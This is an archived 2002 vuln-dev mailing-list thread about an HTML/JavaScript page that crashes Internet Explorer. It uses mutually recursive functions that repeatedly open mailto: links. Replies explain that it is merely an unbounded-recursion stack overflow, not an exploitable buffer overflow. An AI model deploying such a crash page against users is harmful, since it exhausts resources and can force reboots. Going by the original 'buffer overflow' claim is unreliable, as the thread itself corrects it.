RE: Buffer Overflow with all versions of Internet Explorer and Javacript.

From: Thor Larholm (Thorat_private)
Date: Mon Jun 03 2002 - 09:02:26 PDT


    I believe that is what I was trying to explain, Matias, though more
    step-by-step :P
    
    -----Original Message-----
    From: Elan Hasson [mailto:elanat_private]
    Sent: 3 June 2002 18:00
    To: Thor Larholm; 'Matias Sedalo'; vuln-devat_private
    Subject: RE: Buffer Overflow with all versions of Internet Explorer and
    Javacript.
    
    
    Uh, do you realize what is being done with that code?
    
    It's the equivalent of
    
    function a(){
    	return b();
    }
    function b(){
    	return a();
    }
    
    It's a fricken stack overflow. It'll happen anywhere.
    
    -----Original Message-----
    From: Thor Larholm [mailto:Thorat_private]
    Sent: Monday, June 03, 2002 7:27 AM
    To: 'Matias Sedalo'; vuln-devat_private
    Subject: RE: Buffer Overflow with all versions of Internet Explorer and
    Javacript.
    
    
    The button calls hacerMail() which ends up calling soporte() which in turn
    ends up calling hacerMail() as argument to the close() method. You have
    yourself a nice recursive function without ending, and as a side effect you
    are opening lots of mail messages which also exhausts resources.
    
    
    -----Original Message-----
    From: Matias Sedalo [mailto:s0t4ipv6at_private]
    Sent: 2 June 2002 23:08
    To: vuln-devat_private
    Subject: Buffer Overflow with all versions of Internet Explorer and
    Javacript.
    
    
    On 28/07/1999 I discovered a stack buffer overflow caused by, as of this
    moment, all versions of Internet Explorer.
    On many Windows 98 machines it makes it necessary to reboot the machine, since
    it seems to me it runs out of memory.
    It has only been tested on several version 5 releases of IE on Windows NT
    Server SP6 and Windows 98 Second Edition. As I said before, on Windows 98
    I had to force a reboot.
    Could it be possible to execute arbitrary code using the variable company of
    the example?
    
    // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
    // internet Explorer 5.00.3500.1003 on Windows98se
    
    -----------cut here---------------------------
    <html><head></head>
    <body>
    <script language="JAVASCRIPT">
    // Entry point: hacerMail() -> crear() sets the global `company`, then soporte()
    // navigates to a mailto: URL and calls hacerMail() again, so the two functions
    // recurse into each other with no base case.
    function hacerMail() {
      var company;                          // local; soporte() reads the global set by crear(), not this one

      crear();
      address="s0t4ipv6at_private";         // implicit global, read by soporte()
      soporte();
    }
    function soporte(){
      var soporte="billat_private";
      window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
    // window.location=company;             // also this line causes the bof.
      close(hacerMail());                   // hacerMail() is evaluated first, so close() is never reached
    }
    function crear(){
    company="shellcode here?\n";            // i don't think so.
    }
    </script>
      <input type="button" onClick="hacerMail();" value="SMASH!">
    </body>
    </html>
    -----------cut here---------------------------
    
    Regards.
    
    - The Internet is harmful to your health -
    - Law No. 127.0.0.1
    
    Matias Sedalo 	
    http://www.shellcode.com.ar
    
    s0t4ipv6at_private
    B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
    ........................................
    



    This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 10:13:56 PDT